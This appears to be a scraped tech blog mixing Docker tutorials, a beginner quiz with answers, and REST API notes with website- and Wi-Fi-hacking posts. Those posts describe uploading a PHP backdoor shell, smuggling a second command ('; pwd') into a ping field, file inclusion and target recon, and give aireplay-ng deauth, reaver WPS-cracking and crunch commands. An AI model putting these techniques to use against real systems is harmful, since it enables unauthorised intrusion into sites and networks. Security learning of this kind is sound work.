Docker CLI

Image list installed on your machine

docker image ls

Download docker image

docker image pull <docker image name>

Remove a docker image

docker image rm <docker image name or hash code>

Execute a container:

docker container run <docker image name>

Show running containers:

docker container ls

Show all container, also the one that are not running in that moment:

docker container ls --all

Remove a container

docker container rm <container name>

Start and stop container:

docker container start <container name>
docker container stop <container name>
Website hack – discovering vulnerabilities

File upload

The easy type of vulnerability, because a php o python or other type of file could be uploaded and, once called can represent a backdoor on server machine.
For instance, if the server knows php, then through a program call e weevly, a php shell can be created (by weevly) and uploaded. From that moment it’s enough to get the URL of the uploaded php shell and through weevly we can connect to the server (starting from the folder where the shell has been saved).

Command execution vulnerability

This type of vulnerability allows to execute OS command on the target server.

When a function in the webpage allows to execute OS command (a ping for instance)
we can add a “;” after the command executed adding a second command.
For instance, in a page that allows to do a ping, after the IP address we can add “; pwd”

Local/Remote file inclusion

it allows to read files outside www directory
When a webpage includes, using URL, another page we can include, using relative path, other files on the server, and their content will be displayed.
Same happens in case the webserver allows to include remote file. In that case we can include a file made by us, and available remotely, which could contain a command tha will be executed when we include the remote file

Mitigation

File Upload

Always check the content type (and not the extension) of the file uploaded (images/media,…)

Code execution

Don’t use it or filter the input

File inclusion

Prevent remote file inclusion
Use static file inclusion and not dynamic one.

Docker Images

Docker Images (DI) are like Classes for java, and defines a Docker Container.

DI is not one element but It is a set of (reusable) layers. Each layers is a service/program/OS/file.

For instance, when we pull an image we get a result like this:

giuseppefanuzzi@Giuseppes-MacBook-Pro ~ % docker pull mysql      
Using default tag: latest
latest: Pulling from library/mysql
46ef68baacb7: Pull complete 
94c1114b2e9c: Pull complete 
ff05e3f38802: Pull complete 
41cc3fcd9912: Pull complete 
07bbc8bdf52a: Pull complete 
6d88f83726a9: Pull complete 
cf5c7d5d33f7: Pull complete 
9db3175a2a66: Pull complete 
feaedeb27fa9: Pull complete 
cf91e7784414: Pull complete 
b1770db1c329: Pull complete 
Digest: sha256:15f069202c46cf861ce429423ae3f8dfa6423306fbf399eaef36094ce30dd75c
Status: Downloaded newer image for mysql:latest
docker.io/library/mysql:latest

DI are built in Layers. layers will receive an ID (SHA256)

Images ids are represented with SHA256 values derived based on his SHA256 layers.

DI are immutables, once built the files can’t be modified.

The hash value of an image is referred as “tag’ name.

When we pull an image normally we specify his name and sometimes his tag

For instance:

The REPOSITORY column represents the name.

The image tag name is the couple NAME:TAG.

For instance “hello-world:latest”

Docker Hello world

After having installed docker on your operating system (with Windows you need a Linux VM) we can try to say our first hello world typing

docker run hello-world

This will end up with a lot of interesting things to learn.

First of all on how to run a container: docker run <containername>

Then, in the output of this command we can see that, if the container is not found locally, docker client runtime will try to download the image it from his repository (docker hub). Then it will create the container starting from the downloaded image.

the second time you execute the same command it will find the container locally avoiding to download it again.

Preliminary steps to get information about target website

Do you want to hack a wesite?

Follow these steps first, to gather few information about it.

Try to get the following:

  • IP address
  • Domain info
  • Technology used in n the website (programming language, db, …)
  • Other website on the same server
  • DNS records
  • Unlisted files, subdomain, etc

IP address

So we can start to use whois lookup (https://who.is/, https://whois.domaintools.com/), to find information about the domains and the owner

Technologies

To know about technologies used on the website we can check with netcraft website (https://www.netcraft.com/tools/)

DNS record

To get DNS information user the website https://www.robtex.com/

Other website on the same server

In some cases a website is hosted inside a server in which are hosted many other website. So if you can access to your target website, you can try to access to some other website on that server. Basically the all the website on the same server have the same IP address.
robtext.com can show them. Or also Bing can show them, just look for the IP address of the target website and the search result will show all the other websites hosted on the server.

Subdomain

To know subdomains could help to find extra info about the target website.
To know the different subdomain we can use a Linux app called knock (you need python installed).

git clone https://github.com/guelfoweb/knock.git
cd knock
pip3 install -r requirements.txt

python3 knockpy.py <targetwebsite>

And the result will be the list of all subdomains

Unlisted files and folder

To find folder and files could be very helpful because they can contain user, password or other important and sensitive info.
To discover files and folder exposed on the website we can use a tool named “dirb”. It’s a Linux app which uses the brute force to discover them. It has a list of names that will be used to find hidden folder and files.
This list from dirb contains many default file name like robot.txt and config.ini which can contains files that the target website owner doesn’t want to index to search emgine or the db configuration.

REST API Contraints

Is your architecture RESTFul?

An architecture could be REST Like or RESTish

To be RESTFull an architecture should follow 6 rules, known as RESTFul Architectures Contraints:

  • Client – Server architectural principle
  • Uniform interface, that is the use of well-defined communication contract between the client and the server
  • Statelessness, the server must not manage the state of the application
  • Caching, the server controls the caching of response using HTTP header for caching
  • Layered system, multiple layer managed independently
  • Code on demand (optional), it means that the server could send to client also some code that could be executed by the client

Based on the rules above, an architecture could have 4 levels/score, from 0 to 3 (Richardson Maturity level)

Client – Server

It’s basically about the separation of the concerns (SoC).

It’s an architectural principle used in programming to separate an application into units, with minimal overlapping between the functions of each individual unit.

So Client and Server are not sharing any code and they are not executed in the same process.

Server doesn’t call directly the Client, and viceversa. They are decoupled. There is no dependency between them.

Client and Server can change without impacting each other.

Uniform Interface

Client and server shares a common technical interface.

An interface is a technical contract for communication between client and server, that’s nothing about business constraint.

the contract is defined by HTTP method and media types.

The advantage is that it decouples totally client and server. They are 100% technologically independent to each other.

the 4 guiding principles

  1. identity of the resource (uri/url), the client can call a url to manipulate the resource
  2. representation of the resource, the data can be represented differently and in a different format from how it is managed on the server side
  3. self-descriptive messages, request and response have enough data to process request and response.
    • Server can use content-type, http status code, host (which host is the response coming from)
    • Client can use Accept.
  4. Hypermedia, it means that the server send back to client not only the data but also the action that the client should execute (known as HATEOAS)

Statelessness

Each client request is indipendent

Server receives all info it needs from the client request

Caching

A typical web application can have multiple level of caching.

Local cache, the one managed by the browser.

Shared cache on the gateway and on the application server

The advantages can be performance ones and scalability

Response messages should be explicitly marked as cacheable or non cacheable .

Caching is managed by the server thanks to the http headers.

cache-control header

cache policy directive: who, how long, under what condition. Ex:

cache-control: private;max-age=120

it means that only the client can ask for caching and that the cache will be stored only foe 120 seconds

expire header

This header specifies a fixed date/time for the expiration of a cached resource. For example, 

Expires: Sat, 13 May 2017 07:00:00 GMT 

means that the cached resource expires on May 13, 2017 at 7:00 am GMT

ETag

 A response header that identifies the version of served content according to a token – a string of characters in quotes, e.g., 

"675af34563dc-tr34" – that changes after a resource is modified. If a token is unchanged before a request is made, the browser continues to use its local version.

Layered System

Client-server architecture consists of multiple layer. It’a a one way path: a layer can’t comunicate with the previous layer.

layers can be moved, added, deleted based on needs

Installing Docker

Installing Docker on different platforms is a straightforward process. Here are step-by-step instructions for installing Docker on macOS, Linux, and Windows:

Installing Docker on macOS:

Prerequisites:

  • macOS 10.13 (High Sierra) or later.
  • An Intel-based Mac. Docker does not support Apple Silicon (M1) natively at the time of my last knowledge update in September 2021, so for M1 users, you may need additional workarounds like using Rosetta or an emulator.

Installation Steps:

  1. Visit the Docker Desktop for Mac download page: Docker Desktop for Mac
  2. Click the “Download for Mac” button to download the Docker Desktop for Mac installer.
  3. Open the downloaded DMG file and drag the Docker application to your Applications folder.
  4. Launch Docker by searching for “Docker” in your Applications folder or using Spotlight.
  5. Once Docker is running, you should see a Docker icon in your menu bar. Click on it to access Docker settings and manage containers.
  6. Docker is now installed and ready to use on your macOS.

Installing Docker on Linux:

Note: The steps for installing Docker on Linux can vary depending on your distribution. Here, we’ll cover the installation process for Ubuntu, a popular Linux distribution.

Installation Steps (for Ubuntu):

  1. Open a terminal window.
  2. Update the package list on your system:
    sudo apt-get update
  3. Install the necessary packages to allow apt to use a repository over HTTPS and ensure compatibility:
    sudo apt-get install apt-transport-https ca-certificates curl software-properties-common
  4. Download and add the Docker GPG key to your system:
    curl -fsSL https://download.docker.com/linux/ubuntu/gpg | sudo gpg --dearmor -o /usr/share/keyrings/docker-archive-keyring.gpg
  5. Add the Docker repository to your APT sources:
    echo "deb [signed-by=/usr/share/keyrings/docker-archive-keyring.gpg] https://download.docker.com/linux/ubuntu $(lsb_release -cs) stable" | sudo tee /etc/apt/sources.list.d/docker.list > /dev/null
  6. Update the package list again:
    sudo apt-get update
  7. Finally, install Docker:
    sudo apt-get install docker-ce docker-ce-cli containerd.io
  8. Start and enable Docker to run on system boot:
    sudo systemctl start docker sudo systemctl enable docker
  9. You can verify the installation by running:
    sudo docker --version

Installing Docker on Windows:

Prerequisites:

  • Windows 10 64-bit: Pro, Enterprise, or Education editions.
  • Hyper-V and Containers Windows features enabled.

Installation Steps:

  1. Visit the Docker Desktop for Windows download page: Docker Desktop for Windows
  2. Click the “Download for Windows” button to download the Docker Desktop for Windows installer.
  3. Run the downloaded installer. If prompted, allow the installer to make changes to your device.
  4. Follow the installation wizard, which includes enabling Hyper-V and Containers features if they are not already enabled.
  5. Once the installation is complete, Docker Desktop for Windows will launch automatically. You should see the Docker icon in your system tray.
  6. Docker is now installed and ready to use on your Windows machine.

Depending on your Linux distribution or specific Windows version, there may be slight variations, so it’s always a good idea to consult the official Docker documentation for the most up-to-date and detailed instructions.

What is Docker

Welcome to the world of Docker, where containerization transforms the way we develop, ship, and manage applications.

In this beginner-friendly post, we’ll embark on a journey to understand the fundamental concepts of Docker, setting up Docker on different platforms, and exploring its real-world applications. By the end of this session, you’ll have a solid grasp of what Docker is and how it can revolutionize your software development process.

Understanding Containerization

Containerization is like magic for software developers. It allows you to package an application and its dependencies into a single unit, known as a container. Think of it as a self-contained box that holds everything your app needs to run smoothly, from libraries to system tools. Containers are lightweight, efficient, and highly portable.

A container is

  • an isolated runtime inside of Linux
  • provides a private space under Linux
  • run under any modern Linux kernel

his container has

  • his own process space
  • his own network interface
  • his own disk space

Run as root (inside the container)

Docker vs. Traditional Virtualization

Before Docker, virtualization was the go-to method for running multiple applications on a single server. However, it had its drawbacks. Virtual machines (VMs) are resource-intensive and slower to start. Docker containers, on the other hand, are much more lightweight, as they share the host OS kernel, making them faster and more efficient.

Use Cases for Docker

Docker is incredibly versatile and finds applications across various industries. It’s used for software development, testing, and production deployments. Whether you’re a developer, system administrator, or data scientist, Docker can streamline your workflow and simplify application management.

Setting up Docker

Installing Docker on Various Platforms

Getting started with Docker is easy, regardless of your operating system. Docker provides installation packages for Windows, macOS, and Linux. It’s a matter of a few clicks or commands to have Docker up and running on your machine.

To install Docker on your machin check this post

Exploring Docker Desktop (for Windows and macOS)

For Windows and macOS users, Docker Desktop is a user-friendly tool that simplifies container management. It provides a graphical interface to manage containers, images, and more. It’s a great starting point for those new to Docker.

Docker Versioning and Compatibility

Docker evolves rapidly, with frequent updates and new features. It’s important to understand Docker’s versioning and compatibility matrix to ensure that your containers work seamlessly across different environments.

Docker terminology

Docker Image, representation of a docker container. For instance like a JAR or WAR.

Docker Container, the runtime of Docker. Basically a deployed and running docker image, the instance of the docker image.

Docker Engine, the code which manages Docker stuff. Creates and runs Docker containers

Docker Editions

Docker Enterprise and Community editions

Docker Enterprise, is a Caas (Container as a Service) platform subscription (payed)

Docker Community is a free Docker edition

Question 1: What is containerization?

a) A process of shipping physical containers with software inside
b) A way to package applications and their dependencies
c) A type of virtual machine
d) A tool for managing servers

Correct answer: b) A way to package applications and their dependencies

Question 2: What is a key advantage of Docker containers over traditional virtual machines?

a) Docker containers are more secure
b) Docker containers are larger in size
c) Docker containers share the host OS kernel
d) Docker containers have a GUI

Correct answer: c) Docker containers share the host OS kernel

Question 3: Which of the following is NOT a common use case for Docker?

a) Simplifying application deployment
b) Creating virtual machines
c) Building and testing applications
d) Scaling applications on-demand

Correct answer: b) Creating virtual machines

Question 4: Which platforms does Docker provide installation packages for?

a) Windows, macOS, Linux
b) Windows only
c) macOS only
d) Linux only

Correct answer: a) Windows, macOS, Linux

Question 5: What is Docker Desktop primarily used for?

a) Creating virtual machines
b) Managing Docker containers and images
c) Writing code
d) Playing games

Correct answer: b) Managing Docker containers and images

Question 6: Why is it essential to be aware of Docker’s versioning and compatibility?

a) To ensure your containers work consistently across environments
b) To track the stock market
c) To play the latest video games
d) To learn about new Docker features

Correct answer: a) To ensure your containers work consistently across environments

What is an API

API (Application Programming Interface) are like user interfaces but targeted to be consumed by other applications rather than humans.

This interface defines a contract between provider and consumer.

A contract is the exact structure of the request and response

A bit of story: API format

First API format were:

  • XML RPC (Remote Procedure Call)
  • XML SOAP (Simple Object Access Protocol)

Problem

But … XML is heavy in terms of network traffic, so you couldn’t have large payloads crossing over from the webserver to the clients.

XML parsing is CPU and memory intensive

REST Json

Because of previous problems a new exchange format started to be used:

Rest (Representational State Transfer) JSON (Javascript Object Notation)

RESTful

REST stands for REpresentational STate, which means a set of attribute that an object/thing/entity has in a certain moment. This state is managed by a backend system

Rest is not a specific technology, is not a standard

An API is restful when the API has been built using the RESTful architectural style and it follows the principles for RESTful APIs.

HTTP is the preferred protocol to use API with

TYPES OF API

REST API Consumer

  • Private or Internal (part of the same organization)
  • Public or External (outside of the organization)
  • Partner (trusted relationship with the organization)

REST API TYPES

  • Private API, for private consumer
  • Public/External API for public/external consumer
  • Parter API, for partner consumer

There is no particular difference in coding or design these different APIs. What it changes is that they need different aspect in the management of Security, documentation, access request and SLA.

API Security

Private API, consumer are internal and so known (trusted developers). So we can use:

  • Basic auth
  • proprietary schemes

For public and partner API it’s not possible to trust developer, So we can use:

  • key/secret
  • OAuth

Documentation

In case of Partner and private API we are in a “controlled environment”, so no formal documentation

In the public API we talk about uncontrolled environment, we don’t know about unformal documentation, so we need to publish the documentation on a developer portal (which is a good practice also for the other types)

Access Request

for private and partner API, because of controlled environment we can ask it through emails of internal ticketing/process

In case of public API, uncontrolled environment, it’s a good idea to have request for access through a developer portal (which is a good practice also for the other types)

SLA Management

SLA stands for Service Level Agreement, and specifies which service to expect from a service provider and which are the conditions.

Because of API are sort of contracts, consumer and provider has to agree on the quality and condition of the service, for instance up time 99%, throughput 20 calls per seconds and support by email

How to get wireless with WPS enabled

we will use a program named wash

root@kali:~# wash -i wlan0

where wlan0 is the wireless network interface

root@kali:~# aireplay-ng –fakeauth 30 -a E4:8F:34:37:BA:0C -h 7C:8B:CA:1B:D8:31 wlan0

root@kali:~# reaver –bssid E4:8F:34:37:BA:0C –channel 2 –interface wlan0 -vvv –no-associate

deauthentication to intercept the handshake:

root@kali:~# aireplay-ng –deauth 4 -a E4:8F:34:37:BA:0C -c 80:35:C1:52:D8:E3 wlan0

crunch 6 11